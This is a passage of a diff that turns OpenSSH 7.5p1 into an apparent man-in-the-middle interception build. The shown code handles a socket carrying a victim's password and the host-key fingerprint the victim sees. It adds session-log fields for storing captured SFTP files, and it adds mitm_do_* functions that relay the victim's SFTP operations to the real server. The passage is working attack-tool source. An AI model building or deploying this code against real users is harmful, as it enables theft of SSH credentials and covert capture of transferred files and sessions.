1469. +      debug("MITM: SHA256 fingerprint seen by victim: [%s]", c->our_sha256_fingerprint);
1470. +    }
1471. +
1472. +    /* Free the buffer we read data from the socket into. */
1473. +    free(saved_buffer); saved_buffer = NULL; buffer = NULL;
1474. +  }
1475. +
1476. +  /* We are done with this socket, so shut it down, delete the file, and
1477. +  * free the filename. */
1478. +  shutdown(client_fd, SHUT_RDWR);
1479. +  close(sock_fd);
1480. +  unlink(*password_and_fingerprint_socket_name);
1481. +  free(*password_and_fingerprint_socket_name); *password_and_fingerprint_socket_name = NULL;
1482. +}
1483. diff -ru --new-file -x '*~' -x 'config.*' -x Makefile -x opensshd.init -x survey.sh -x openssh.xml -x buildpkg.sh -x output.0 -x requests -x traces.0 -x configure openssh-7.5p1/session.h openssh-7.5p1-mitm/session.h
1484. --- openssh-7.5p1/session.h 2017-03-19 22:39:27.000000000 -0400
1485. +++ openssh-7.5p1-mitm/session.h    2018-06-12 17:44:46.345760658 -0400
1486. @@ -60,6 +60,10 @@
1487.         char    *name;
1488.         char    *val;
1489.     } *env;
1490. +   int     is_sftp;          /* Set to 1 if this is an SFTP session. */
1491. +   char    *session_log_dir; /* The directory to store SFTP files in. */
1492. +   char    *session_log_filepath; /* The file path of the session log. */
1493. +   int     session_log_fd;   /* A descriptor to this session's log file. */
1494.  };
1495.  
1496.  void    do_authenticated(Authctxt *);
1497. diff -ru --new-file -x '*~' -x 'config.*' -x Makefile -x opensshd.init -x survey.sh -x openssh.xml -x buildpkg.sh -x output.0 -x requests -x traces.0 -x configure openssh-7.5p1/sftp.c openssh-7.5p1-mitm/sftp.c
1498. --- openssh-7.5p1/sftp.c    2017-03-19 22:39:27.000000000 -0400
1499. +++ openssh-7.5p1-mitm/sftp.c   2018-06-12 17:44:46.345760658 -0400
1500. @@ -579,9 +579,10 @@
1501.  remote_is_dir(struct sftp_conn *conn, const char *path)
1502.  {
1503.     Attrib *a;
1504. +   u_int status;
1505.  
1506.     /* XXX: report errors? */
1507. -   if ((a = do_stat(conn, path, 1)) == NULL)
1508. +   if ((a = do_stat(conn, path, 1, &status)) == NULL)
1509.         return(0);
1510.     if (!(a->flags & SSH2_FILEXFER_ATTR_PERMISSIONS))
1511.         return(0);
1512. @@ -1431,6 +1432,7 @@
1513.     char path_buf[PATH_MAX];
1514.     int err = 0;
1515.     glob_t g;
1516. +   u_int status;
1517.  
1518.     path1 = path2 = NULL;
1519.     cmdnum = parse_args(&cmd, &ignore_errors, &aflag, &fflag, &hflag,
1520. @@ -1500,11 +1502,12 @@
1521.         break;
1522.     case I_CHDIR:
1523.         path1 = make_absolute(path1, *pwd);
1524. -       if ((tmp = do_realpath(conn, path1)) == NULL) {
1525. +       if ((tmp = do_realpath(conn, path1, &status)) == NULL) {
1526.             err = 1;
1527.             break;
1528.         }
1529. -       if ((aa = do_stat(conn, tmp, 0)) == NULL) {
1530. +       u_int status;
1531. +       if ((aa = do_stat(conn, tmp, 0, &status)) == NULL) {
1532.             free(tmp);
1533.             err = 1;
1534.             break;
1535. @@ -1593,7 +1596,8 @@
1536.         path1 = make_absolute(path1, *pwd);
1537.         remote_glob(conn, path1, GLOB_NOCHECK, NULL, &g);
1538.         for (i = 0; g.gl_pathv[i] && !interrupted; i++) {
1539. -           if (!(aa = do_stat(conn, g.gl_pathv[i], 0))) {
1540. +           u_int status;
1541. +           if (!(aa = do_stat(conn, g.gl_pathv[i], 0, &status))) {
1542.                 if (err_abort) {
1543.                     err = -1;
1544.                     break;
1545. @@ -2041,6 +2045,7 @@
1546.     char cmd[2048];
1547.     int err, interactive;
1548.     EditLine *el = NULL;
1549. +   u_int status;
1550.  #ifdef USE_LIBEDIT
1551.     History *hl = NULL;
1552.     HistEvent hev;
1553. @@ -2078,7 +2083,7 @@
1554.     }
1555.  #endif /* USE_LIBEDIT */
1556.  
1557. -   remote_path = do_realpath(conn, ".");
1558. +   remote_path = do_realpath(conn, ".", &status);
1559.     if (remote_path == NULL)
1560.         fatal("Need cwd");
1561.  
1562. diff -ru --new-file -x '*~' -x 'config.*' -x Makefile -x opensshd.init -x survey.sh -x openssh.xml -x buildpkg.sh -x output.0 -x requests -x traces.0 -x configure openssh-7.5p1/sftp-client.c openssh-7.5p1-mitm/sftp-client.c
1563. --- openssh-7.5p1/sftp-client.c 2017-03-19 22:39:27.000000000 -0400
1564. +++ openssh-7.5p1-mitm/sftp-client.c    2018-06-12 17:44:46.345760658 -0400
1565. @@ -74,6 +74,7 @@
1566.  # define SFTP_DIRECTORY_CHARS      "/"
1567.  #endif /* HAVE_CYGWIN */
1568.  
1569. +/*
1570.  struct sftp_conn {
1571.     int fd_in;
1572.     int fd_out;
1573. @@ -90,10 +91,13 @@
1574.     u_int64_t limit_kbps;
1575.     struct bwlimit bwlimit_in, bwlimit_out;
1576.  };
1577. +*/
1578. +struct sftp_conn *client_conn = NULL;
1579. +
1580.  
1581.  static u_char *
1582. -get_handle(struct sftp_conn *conn, u_int expected_id, size_t *len,
1583. -    const char *errfmt, ...) __attribute__((format(printf, 4, 5)));
1584. +get_handle(struct sftp_conn *conn, u_int expected_id, u_int *status, size_t *len,
1585. +    const char *errfmt, ...) __attribute__((format(printf, 5, 6)));
1586.  
1587.  /* ARGSUSED */
1588.  static int
1589. @@ -231,11 +235,11 @@
1590.  }
1591.  
1592.  static u_char *
1593. -get_handle(struct sftp_conn *conn, u_int expected_id, size_t *len,
1594. +get_handle(struct sftp_conn *conn, u_int expected_id, u_int *status, size_t *len,
1595.      const char *errfmt, ...)
1596.  {
1597.     struct sshbuf *msg;
1598. -   u_int id, status;
1599. +   u_int id;
1600.     u_char type;
1601.     u_char *handle;
1602.     char errmsg[256];
1603. @@ -258,10 +262,10 @@
1604.         fatal("%s: ID mismatch (%u != %u)",
1605.             errfmt == NULL ? __func__ : errmsg, id, expected_id);
1606.     if (type == SSH2_FXP_STATUS) {
1607. -       if ((r = sshbuf_get_u32(msg, &status)) != 0)
1608. +       if ((r = sshbuf_get_u32(msg, status)) != 0)
1609.             fatal("%s: buffer error: %s", __func__, ssh_err(r));
1610.         if (errfmt != NULL)
1611. -           error("%s: %s", errmsg, fx2txt(status));
1612. +           error("%s: %s", errmsg, fx2txt(*status));
1613.         sshbuf_free(msg);
1614.         return(NULL);
1615.     } else if (type != SSH2_FXP_HANDLE)
1616. @@ -276,7 +280,7 @@
1617.  }
1618.  
1619.  static Attrib *
1620. -get_decode_stat(struct sftp_conn *conn, u_int expected_id, int quiet)
1621. +get_decode_stat(struct sftp_conn *conn, u_int expected_id, int quiet, u_int *status)
1622.  {
1623.     struct sshbuf *msg;
1624.     u_int id;
1625. @@ -296,14 +300,13 @@
1626.     if (id != expected_id)
1627.         fatal("ID mismatch (%u != %u)", id, expected_id);
1628.     if (type == SSH2_FXP_STATUS) {
1629. -       u_int status;
1630.  
1631. -       if ((r = sshbuf_get_u32(msg, &status)) != 0)
1632. +       if ((r = sshbuf_get_u32(msg, status)) != 0)
1633.             fatal("%s: buffer error: %s", __func__, ssh_err(r));
1634.         if (quiet)
1635. -           debug("Couldn't stat remote file: %s", fx2txt(status));
1636. +           debug("Couldn't stat remote file: %s", fx2txt(*status));
1637.         else
1638. -           error("Couldn't stat remote file: %s", fx2txt(status));
1639. +           error("Couldn't stat remote file: %s", fx2txt(*status));
1640.         sshbuf_free(msg);
1641.         return(NULL);
1642.     } else if (type != SSH2_FXP_ATTRS) {
1643. @@ -322,7 +325,7 @@
1644.  
1645.  static int
1646.  get_decode_statvfs(struct sftp_conn *conn, struct sftp_statvfs *st,
1647. -    u_int expected_id, int quiet)
1648. +    u_int expected_id, int quiet, u_int *status)
1649.  {
1650.     struct sshbuf *msg;
1651.     u_char type;
1652. @@ -342,14 +345,12 @@
1653.     if (id != expected_id)
1654.         fatal("ID mismatch (%u != %u)", id, expected_id);
1655.     if (type == SSH2_FXP_STATUS) {
1656. -       u_int status;
1657. -
1658. -       if ((r = sshbuf_get_u32(msg, &status)) != 0)
1659. +       if ((r = sshbuf_get_u32(msg, status)) != 0)
1660.             fatal("%s: buffer error: %s", __func__, ssh_err(r));
1661.         if (quiet)
1662. -           debug("Couldn't statvfs: %s", fx2txt(status));
1663. +           debug("Couldn't statvfs: %s", fx2txt(*status));
1664.         else
1665. -           error("Couldn't statvfs: %s", fx2txt(status));
1666. +           error("Couldn't statvfs: %s", fx2txt(*status));
1667.         sshbuf_free(msg);
1668.         return -1;
1669.     } else if (type != SSH2_FXP_EXTENDED_REPLY) {
1670. @@ -523,7 +524,7 @@
1671.     u_int count, id, i, expected_id, ents = 0;
1672.     size_t handle_len;
1673.     u_char type, *handle;
1674. -   int status = SSH2_FX_FAILURE;
1675. +   int status = SSH2_FX_FAILURE, status_ret;
1676.     int r;
1677.  
1678.     if (dir)
1679. @@ -539,7 +540,7 @@
1680.         fatal("%s: buffer error: %s", __func__, ssh_err(r));
1681.     send_msg(conn, msg);
1682.  
1683. -   handle = get_handle(conn, id, &handle_len,
1684. +   handle = get_handle(conn, id, &status_ret, &handle_len,
1685.         "remote readdir(\"%s\")", path);
1686.     if (handle == NULL) {
1687.         sshbuf_free(msg);
1688. @@ -730,7 +731,7 @@
1689.  }
1690.  
1691.  Attrib *
1692. -do_stat(struct sftp_conn *conn, const char *path, int quiet)
1693. +do_stat(struct sftp_conn *conn, const char *path, int quiet, u_int *status)
1694.  {
1695.     u_int id;
1696.  
1697. @@ -740,11 +741,11 @@
1698.         conn->version == 0 ? SSH2_FXP_STAT_VERSION_0 : SSH2_FXP_STAT,
1699.         path, strlen(path));
1700.  
1701. -   return(get_decode_stat(conn, id, quiet));
1702. +   return(get_decode_stat(conn, id, quiet, status));
1703.  }
1704.  
1705.  Attrib *
1706. -do_lstat(struct sftp_conn *conn, const char *path, int quiet)
1707. +do_lstat(struct sftp_conn *conn, const char *path, int quiet, u_int *status)
1708.  {
1709.     u_int id;
1710.  
1711. @@ -753,20 +754,20 @@
1712.             debug("Server version does not support lstat operation");
1713.         else
1714.             logit("Server version does not support lstat operation");
1715. -       return(do_stat(conn, path, quiet));
1716. +       return(do_stat(conn, path, quiet, status));
1717.     }
1718.  
1719.     id = conn->msg_id++;
1720.     send_string_request(conn, id, SSH2_FXP_LSTAT, path,
1721.         strlen(path));
1722.  
1723. -   return(get_decode_stat(conn, id, quiet));
1724. +   return(get_decode_stat(conn, id, quiet, status));
1725.  }
1726.  
1727.  #ifdef notyet
1728.  Attrib *
1729.  do_fstat(struct sftp_conn *conn, const u_char *handle, u_int handle_len,
1730. -    int quiet)
1731. +    int quiet, u_int *status)
1732.  {
1733.     u_int id;
1734.  
1735. @@ -774,7 +775,7 @@
1736.     send_string_request(conn, id, SSH2_FXP_FSTAT, handle,
1737.         handle_len);
1738.  
1739. -   return(get_decode_stat(conn, id, quiet));
1740. +   return(get_decode_stat(conn, id, quiet, status));
1741.  }
1742.  #endif
1743.  
1744. @@ -813,7 +814,7 @@
1745.  }
1746.  
1747.  char *
1748. -do_realpath(struct sftp_conn *conn, const char *path)
1749. +do_realpath(struct sftp_conn *conn, const char *path, u_int *status)
1750.  {
1751.     struct sshbuf *msg;
1752.     u_int expected_id, count, id;
1753. @@ -838,11 +839,9 @@
1754.         fatal("ID mismatch (%u != %u)", id, expected_id);
1755.  
1756.     if (type == SSH2_FXP_STATUS) {
1757. -       u_int status;
1758. -
1759. -       if ((r = sshbuf_get_u32(msg, &status)) != 0)
1760. +       if ((r = sshbuf_get_u32(msg, status)) != 0)
1761.             fatal("%s: buffer error: %s", __func__, ssh_err(r));
1762. -       error("Couldn't canonicalize: %s", fx2txt(status));
1763. +       error("Couldn't canonicalize: %s", fx2txt(*status));
1764.         sshbuf_free(msg);
1765.         return NULL;
1766.     } else if (type != SSH2_FXP_NAME)
1767. @@ -865,7 +864,7 @@
1768.     free(longname);
1769.  
1770.     sshbuf_free(msg);
1771. -
1772. +   *status = SSH2_FX_OK;
1773.     return(filename);
1774.  }
1775.  
1776. @@ -1076,6 +1075,7 @@
1777.     struct sshbuf *msg;
1778.     u_int id;
1779.     int r;
1780. +   u_int status;
1781.  
1782.     if ((conn->exts & SFTP_EXT_STATVFS) == 0) {
1783.         error("Server does not support statvfs@openssh.com extension");
1784. @@ -1095,7 +1095,7 @@
1785.     send_msg(conn, msg);
1786.     sshbuf_free(msg);
1787.  
1788. -   return get_decode_statvfs(conn, st, id, quiet);
1789. +   return get_decode_statvfs(conn, st, id, quiet, &status);
1790.  }
1791.  
1792.  #ifdef notyet
1793. @@ -1105,6 +1105,7 @@
1794.  {
1795.     struct sshbuf *msg;
1796.     u_int id;
1797. +   u_int status;
1798.  
1799.     if ((conn->exts & SFTP_EXT_FSTATVFS) == 0) {
1800.         error("Server does not support fstatvfs@openssh.com extension");
1801. @@ -1124,7 +1125,7 @@
1802.     send_msg(conn, msg);
1803.     sshbuf_free(msg);
1804.  
1805. -   return get_decode_statvfs(conn, st, id, quiet);
1806. +   return get_decode_statvfs(conn, st, id, quiet, &status);
1807.  }
1808.  #endif
1809.  
1810. @@ -1172,10 +1173,11 @@
1811.     TAILQ_HEAD(reqhead, request) requests;
1812.     struct request *req;
1813.     u_char type;
1814. +   u_int status_ret;
1815.  
1816.     TAILQ_INIT(&requests);
1817.  
1818. -   if (a == NULL && (a = do_stat(conn, remote_path, 0)) == NULL)
1819. +   if (a == NULL && (a = do_stat(conn, remote_path, 0, &status_ret)) == NULL)
1820.         return -1;
1821.  
1822.     /* Do not preserve set[ug]id here, as we do not preserve ownership */
1823. @@ -1212,7 +1214,7 @@
1824.     send_msg(conn, msg);
1825.     debug3("Sent message SSH2_FXP_OPEN I:%u P:%s", id, remote_path);
1826.  
1827. -   handle = get_handle(conn, id, &handle_len,
1828. +   handle = get_handle(conn, id, &status_ret, &handle_len,
1829.         "remote open(\"%s\")", remote_path);
1830.     if (handle == NULL) {
1831.         sshbuf_free(msg);
1832. @@ -1453,6 +1455,7 @@
1833.     SFTP_DIRENT **dir_entries;
1834.     char *filename, *new_src, *new_dst;
1835.     mode_t mode = 0777;
1836. +   u_int status_ret;
1837.  
1838.     if (depth >= MAX_DIR_DEPTH) {
1839.         error("Maximum directory depth exceeded: %d levels", depth);
1840. @@ -1460,7 +1463,7 @@
1841.     }
1842.  
1843.     if (dirattrib == NULL &&
1844. -       (dirattrib = do_stat(conn, src, 1)) == NULL) {
1845. +       (dirattrib = do_stat(conn, src, 1, &status_ret)) == NULL) {
1846.         error("Unable to stat remote directory \"%s\"", src);
1847.         return -1;
1848.     }
1849. @@ -1543,8 +1546,9 @@
1850.  {
1851.     char *src_canon;
1852.     int ret;
1853. +   u_int status;
1854.  
1855. -   if ((src_canon = do_realpath(conn, src)) == NULL) {
1856. +   if ((src_canon = do_realpath(conn, src, &status)) == NULL) {
1857.         error("Unable to canonicalize path \"%s\"", src);
1858.         return -1;
1859.     }
1860. @@ -1579,6 +1583,7 @@
1861.     TAILQ_HEAD(ackhead, outstanding_ack) acks;
1862.     struct outstanding_ack *ack = NULL;
1863.     size_t handle_len;
1864. +   int status_ret;
1865.  
1866.     TAILQ_INIT(&acks);
1867.  
1868. @@ -1607,8 +1612,9 @@
1869.         a.flags &= ~SSH2_FILEXFER_ATTR_ACMODTIME;
1870.  
1871.     if (resume) {
1872. +     u_int status_ret2;
1873.         /* Get remote file size if it exists */
1874. -       if ((c = do_stat(conn, remote_path, 0)) == NULL) {
1875. +       if ((c = do_stat(conn, remote_path, 0, &status_ret2)) == NULL) {
1876.             close(local_fd);
1877.             return -1;
1878.         }
1879. @@ -1643,7 +1649,7 @@
1880.  
1881.     sshbuf_reset(msg);
1882.  
1883. -   handle = get_handle(conn, id, &handle_len,
1884. +   handle = get_handle(conn, id, &status_ret, &handle_len,
1885.         "remote open(\"%s\")", remote_path);
1886.     if (handle == NULL) {
1887.         close(local_fd);
1888. @@ -1818,7 +1824,8 @@
1889.      * the path already existed and is a directory.
1890.      */
1891.     if (do_mkdir(conn, dst, &a, 0) != 0) {
1892. -       if ((dirattrib = do_stat(conn, dst, 0)) == NULL)
1893. +       u_int status_ret;
1894. +       if ((dirattrib = do_stat(conn, dst, 0, &status_ret)) == NULL)
1895.             return -1;
1896.         if (!S_ISDIR(dirattrib->perm)) {
1897.             error("\"%s\" exists but is not a directory", dst);
1898. @@ -1876,8 +1883,9 @@
1899.  {
1900.     char *dst_canon;
1901.     int ret;
1902. +   u_int status;
1903.  
1904. -   if ((dst_canon = do_realpath(conn, dst)) == NULL) {
1905. +   if ((dst_canon = do_realpath(conn, dst, &status)) == NULL) {
1906.         error("Unable to canonicalize path \"%s\"", dst);
1907.         return -1;
1908.     }
1909. @@ -1904,3 +1912,534 @@
1910.     return(ret);
1911.  }
1912.  
1913. +/* Returns the directory handle, which must be free()'ed by the caller. */
1914. +u_char *
1915. +mitm_do_opendir(struct sftp_conn *conn, const char *path, size_t *handle_len, int *status)
1916. +{
1917. +   struct sshbuf *msg;
1918. +   u_int id;
1919. +   u_char *handle;
1920. +   int r;
1921. +
1922. +   id = conn->msg_id++;
1923. +
1924. +   if ((msg = sshbuf_new()) == NULL)
1925. +       fatal("%s: sshbuf_new failed", __func__);
1926. +   if ((r = sshbuf_put_u8(msg, SSH2_FXP_OPENDIR)) != 0 ||
1927. +       (r = sshbuf_put_u32(msg, id)) != 0 ||
1928. +       (r = sshbuf_put_cstring(msg, path)) != 0)
1929. +       fatal("%s: buffer error: %s", __func__, ssh_err(r));
1930. +   send_msg(conn, msg);
1931. +
1932. +   handle = get_handle(conn, id, status, handle_len,
1933. +       "remote opendir(\"%s\")", path);
1934. +   sshbuf_free(msg); msg = NULL;
1935. +   return handle;
1936. +}
1937. +
1938. +Stat *
1939. +mitm_do_readdir(struct sftp_conn *conn, u_int32_t id, u_char *handle_str, size_t handle_len, u_int *count, int *status) {
1940. +   struct sshbuf *msg;
1941. +   Stat *ret;
1942. +   int r;
1943. +   u_char type;
1944. +   u_int i;
1945. +
1946. +   if ((msg = sshbuf_new()) == NULL)
1947. +       fatal("%s: sshbuf_new failed", __func__);
1948. +
1949. +   if ((r = sshbuf_put_u8(msg, SSH2_FXP_READDIR)) != 0 ||
1950. +       (r = sshbuf_put_u32(msg, id)) != 0 ||
1951. +       (r = sshbuf_put_string(msg, handle_str, handle_len)) != 0)
1952. +     fatal("%s: buffer error: %s", __func__, ssh_err(r));
1953. +
1954. +   send_msg(conn, msg);
1955. +   sshbuf_reset(msg);
1956. +   get_msg(conn, msg);
1957. +   if ((r = sshbuf_get_u8(msg, &type)) != 0 ||
1958. +       (r = sshbuf_get_u32(msg, &id)) != 0)
1959. +     fatal("%s: buffer error: %s", __func__, ssh_err(r));
1960. +
1961. +   debug3("Received reply T:%u I:%u", type, id);
1962. +  
1963. +   if (type == SSH2_FXP_STATUS) {
1964. +     u_int rstatus;
1965. +    
1966. +     if ((r = sshbuf_get_u32(msg, &rstatus)) != 0)
1967. +       fatal("%s: buffer error: %s",
1968. +         __func__, ssh_err(r));
1969. +     debug3("Received SSH2_FXP_STATUS %d", rstatus);
1970. +
1971. +     sshbuf_free(msg); msg = NULL;
1972. +     *status = rstatus;
1973. +     return NULL;
1974. +   } else if (type != SSH2_FXP_NAME)
1975. +     fatal("Expected SSH2_FXP_NAME(%u) packet, got %u",
1976. +       SSH2_FXP_NAME, type);
1977. +
1978. +   if ((r = sshbuf_get_u32(msg, count)) != 0)
1979. +     fatal("%s: buffer error: %s", __func__, ssh_err(r));
1980. +   if (*count > SSHBUF_SIZE_MAX)
1981. +     fatal("%s: nonsensical number of entries", __func__);
1982. +   if (*count == 0) {
1983. +     sshbuf_free(msg); msg = NULL;
1984. +     *status = SSH2_FX_EOF;
1985. +     return NULL;
1986. +   }
1987. +
1988. +   debug3("Received %d SSH2_FXP_NAME responses", *count);
1989. +
1990. +   ret = xcalloc(*count, sizeof(Stat));
1991. +
1992. +   for (i = 0; i < *count; i++) {
1993. +     char *name, *long_name;
1994. +     Attrib a;
1995. +
1996. +     if ((r = sshbuf_get_cstring(msg, &name, NULL)) != 0 ||
1997. +         (r = sshbuf_get_cstring(msg, &long_name, NULL)) != 0)
1998. +       fatal("%s: buffer error: %s", __func__, ssh_err(r));
1999. +     if ((r = decode_attrib(msg, &a)) != 0) {
2000. +       free(name); name = NULL;
2001. +       free(long_name); long_name = NULL;
2002. +       sshbuf_free(msg); msg = NULL;
2003. +       *status = SSH2_FX_FAILURE;
2004. +       return NULL;
2005. +     }
2006. +     ret[i].name = name;
2007. +     ret[i].long_name = long_name;
2008. +     ret[i].attrib = a;
2009. +   }
2010. +
2011. +   sshbuf_free(msg); msg = NULL;
2012. +   return ret;
2013. +}
2014. +
2015. +u_int
2016. +mitm_do_close(struct sftp_conn *conn, const u_char *handle, u_int handle_len)
2017. +{
2018. +   u_int id;
2019. +   struct sshbuf *msg;
2020. +   int r;
2021. +
2022. +   if ((msg = sshbuf_new()) == NULL)
2023. +       fatal("%s: sshbuf_new failed", __func__);
2024. +
2025. +   id = conn->msg_id++;
2026. +   if ((r = sshbuf_put_u8(msg, SSH2_FXP_CLOSE)) != 0 ||
2027. +       (r = sshbuf_put_u32(msg, id)) != 0 ||
2028. +       (r = sshbuf_put_string(msg, handle, handle_len)) != 0)
2029. +       fatal("%s: buffer error: %s", __func__, ssh_err(r));
2030. +   send_msg(conn, msg);
2031. +   sshbuf_free(msg); msg = NULL;
2032. +
2033. +   debug3("Sent message SSH2_FXP_CLOSE I:%u", id);
2034. +   return get_status(conn, id);
2035. +}
2036. +
2037. +u_int
2038. +mitm_do_mkdir(struct sftp_conn *conn, const char *path, Attrib *a)
2039. +{
2040. +   u_int id;
2041. +
2042. +   id = conn->msg_id++;
2043. +   send_string_attrs_request(conn, id, SSH2_FXP_MKDIR, path, strlen(path), a);
2044. +   return get_status(conn, id);
2045. +}
2046. +
2047. +u_int
2048. +mitm_do_rmdir(struct sftp_conn *conn, const char *path)
2049. +{
2050. +   u_int id;
2051. +
2052. +   id = conn->msg_id++;
2053. +   send_string_request(conn, id, SSH2_FXP_RMDIR, path, strlen(path));
2054. +   return get_status(conn, id);
2055. +}
2056. +
2057. +u_int
2058. +mitm_do_rm(struct sftp_conn *conn, const char *path)
2059. +{
2060. +   u_int id;
2061. +
2062. +   id = conn->msg_id++;
2063. +   send_string_request(conn, id, SSH2_FXP_REMOVE, path, strlen(path));
2064. +   return get_status(conn, id);
2065. +}
2066. +
2067. +u_int
2068. +mitm_do_rename(struct sftp_conn *conn, const char *oldpath, const char *newpath, int force_legacy)
2069. +{
2070. +   struct sshbuf *msg;
2071. +   u_int id;
2072. +   int r, use_ext = (conn->exts & SFTP_EXT_POSIX_RENAME) && !force_legacy;
2073. +
2074. +   if ((msg = sshbuf_new()) == NULL)
2075. +       fatal("%s: sshbuf_new failed", __func__);
2076. +
2077. +   /* Send rename request */
2078. +   id = conn->msg_id++;
2079. +   if (use_ext) {
2080. +       if ((r = sshbuf_put_u8(msg, SSH2_FXP_EXTENDED)) != 0 ||
2081. +           (r = sshbuf_put_u32(msg, id)) != 0 ||
2082. +           (r = sshbuf_put_cstring(msg,
2083. +           "posix-rename@openssh.com")) != 0)
2084. +           fatal("%s: buffer error: %s", __func__, ssh_err(r));
2085. +   } else {
2086. +       if ((r = sshbuf_put_u8(msg, SSH2_FXP_RENAME)) != 0 ||
2087. +           (r = sshbuf_put_u32(msg, id)) != 0)
2088. +           fatal("%s: buffer error: %s", __func__, ssh_err(r));
2089. +   }
2090. +   if ((r = sshbuf_put_cstring(msg, oldpath)) != 0 ||
2091. +       (r = sshbuf_put_cstring(msg, newpath)) != 0)
2092. +       fatal("%s: buffer error: %s", __func__, ssh_err(r));
2093. +   send_msg(conn, msg);
2094. +   debug3("Sent message %s \"%s\" -> \"%s\"",
2095. +       use_ext ? "posix-rename@openssh.com" :
2096. +       "SSH2_FXP_RENAME", oldpath, newpath);
2097. +   sshbuf_free(msg); msg = NULL;
2098. +
2099. +   return get_status(conn, id);
2100. +}
2101. +
2102. +u_int
2103. +mitm_do_setstat(struct sftp_conn *conn, const char *path, Attrib *a)
2104. +{
2105. +   u_int id = conn->msg_id++;
2106. +   send_string_attrs_request(conn, id, SSH2_FXP_SETSTAT, path, strlen(path), a);
2107. +   return get_status(conn, id);
2108. +}
2109. +
2110. +u_int
2111. +mitm_do_fsetstat(struct sftp_conn *conn, const u_char *handle, u_int handle_len, Attrib *a)
2112. +{
2113. +   u_int id = conn->msg_id++;
2114. +   send_string_attrs_request(conn, id, SSH2_FXP_FSETSTAT, handle, handle_len, a);
2115. +   return get_status(conn, id);
2116. +}
2117. +
2118. +Attrib *
2119. +mitm_do_fstat(struct sftp_conn *conn, const u_char *handle, u_int handle_len, int quiet, u_int *status)
2120. +{
2121. +   u_int id = conn->msg_id++;
2122. +   send_string_request(conn, id, SSH2_FXP_FSTAT, handle, handle_len);
2123. +   return(get_decode_stat(conn, id, quiet, status));
2124. +}
2125. +
2126. +/* Returns 1 on success, with "filename", "longname", and "a" args set to the values obtained, or 0 on failure, with "status" arg set. */
2127. +int
2128. +mitm_do_readlink(struct sftp_conn *conn, const char *path, u_int *status, char **filename, char **longname, Attrib *a)
2129. +{
2130. +   struct sshbuf *msg;
2131. +   u_int expected_id, count, id;
2132. +   u_char type;
2133. +   int r;
2134. +
2135. +   expected_id = id = conn->msg_id++;
2136. +   send_string_request(conn, id, SSH2_FXP_READLINK, path, strlen(path));
2137. +
2138. +   if ((msg = sshbuf_new()) == NULL)
2139. +       fatal("%s: sshbuf_new failed", __func__);
2140. +
2141. +   get_msg(conn, msg);
2142. +   if ((r = sshbuf_get_u8(msg, &type)) != 0 ||
2143. +       (r = sshbuf_get_u32(msg, &id)) != 0)
2144. +       fatal("%s: buffer error: %s", __func__, ssh_err(r));
2145. +
2146. +   if (id != expected_id)
2147. +       fatal("ID mismatch (%u != %u)", id, expected_id);
2148. +
2149. +   if (type == SSH2_FXP_STATUS) {
2150. +       if ((r = sshbuf_get_u32(msg, status)) != 0)
2151. +           fatal("%s: buffer error: %s", __func__, ssh_err(r));
2152. +       sshbuf_free(msg); msg = NULL;
2153. +       return 0;
2154. +   } else if (type != SSH2_FXP_NAME)
2155. +       fatal("Expected SSH2_FXP_NAME(%u) packet, got %u",
2156. +           SSH2_FXP_NAME, type);
2157. +
2158. +   if ((r = sshbuf_get_u32(msg, &count)) != 0)
2159. +       fatal("%s: buffer error: %s", __func__, ssh_err(r));
2160. +   if (count != 1)
2161. +       fatal("Got multiple names (%d) from SSH_FXP_READLINK", count);
2162. +
2163. +   if ((r = sshbuf_get_cstring(msg, filename, NULL)) != 0 ||
2164. +       (r = sshbuf_get_cstring(msg, longname, NULL)) != 0 ||
2165. +       (r = decode_attrib(msg, a)) != 0)
2166. +       fatal("%s: buffer error: %s", __func__, ssh_err(r));
2167. +
2168. +   debug3("SSH_FXP_READLINK %s -> %s", path, *filename);
2169. +   sshbuf_free(msg); msg = NULL;
2170. +   return 1;
2171. +}
2172. +
2173. +u_int
2174. +mitm_do_symlink(struct sftp_conn *conn, const char *oldpath, const char *newpath)
2175. +{
2176. +   struct sshbuf *msg;
2177. +   u_int id;
2178. +   int r;
2179. +
2180. +   if (conn->version < 3)
2181. +       return SSH2_FX_OP_UNSUPPORTED;
2182. +
2183. +   if ((msg = sshbuf_new()) == NULL)
2184. +       fatal("%s: sshbuf_new failed", __func__);
2185. +
2186. +   /* Send symlink request */
2187. +   id = conn->msg_id++;
2188. +   if ((r = sshbuf_put_u8(msg, SSH2_FXP_SYMLINK)) != 0 ||
2189. +       (r = sshbuf_put_u32(msg, id)) != 0 ||
2190. +       (r = sshbuf_put_cstring(msg, oldpath)) != 0 ||
2191. +       (r = sshbuf_put_cstring(msg, newpath)) != 0)
2192. +       fatal("%s: buffer error: %s", __func__, ssh_err(r));
2193. +   send_msg(conn, msg);
2194. +   debug3("Sent message SSH2_FXP_SYMLINK \"%s\" -> \"%s\"", oldpath,
2195. +       newpath);
2196. +   sshbuf_free(msg); msg = NULL;
2197. +
2198. +   return get_status(conn, id);
2199. +}
2200. +
2201. +int
2202. +mitm_do_statvfs(struct sftp_conn *conn, const char *path, struct statvfs *st, u_int *status)
2203. +{
2204. +   struct sshbuf *msg;
2205. +   u_int id;
2206. +   int r;
2207. +   struct sftp_statvfs sftp_st;
2208. +
2209. +   if ((conn->exts & SFTP_EXT_STATVFS) == 0)
2210. +       return SSH2_FX_OP_UNSUPPORTED;
2211. +
2212. +   id = conn->msg_id++;
2213. +
2214. +   if ((msg = sshbuf_new()) == NULL)
2215. +       fatal("%s: sshbuf_new failed", __func__);
2216. +   sshbuf_reset(msg);
2217. +   if ((r = sshbuf_put_u8(msg, SSH2_FXP_EXTENDED)) != 0 ||
2218. +       (r = sshbuf_put_u32(msg, id)) != 0 ||
2219. +       (r = sshbuf_put_cstring(msg, "statvfs@openssh.com")) != 0 ||
2220. +       (r = sshbuf_put_cstring(msg, path)) != 0)
2221. +       fatal("%s: buffer error: %s", __func__, ssh_err(r));
2222. +   send_msg(conn, msg);
2223. +   sshbuf_free(msg); msg = NULL;
2224. +
2225. +   if (get_decode_statvfs(conn, &sftp_st, id, 1, status) == -1)
2226. +     return -1;
2227. +
2228. +   st->f_bsize = sftp_st.f_bsize;
2229. +   st->f_frsize = sftp_st.f_frsize;
2230. +   st->f_blocks = sftp_st.f_blocks;
2231. +   st->f_bfree = sftp_st.f_bfree;
2232. +   st->f_bavail = sftp_st.f_bavail;
2233. +   st->f_files = sftp_st.f_files;
2234. +   st->f_ffree = sftp_st.f_ffree;
2235. +   st->f_favail = sftp_st.f_favail;
2236. +   st->f_fsid = sftp_st.f_fsid;
2237. +   st->f_flag = sftp_st.f_flag;
2238. +   st->f_namemax = sftp_st.f_namemax;
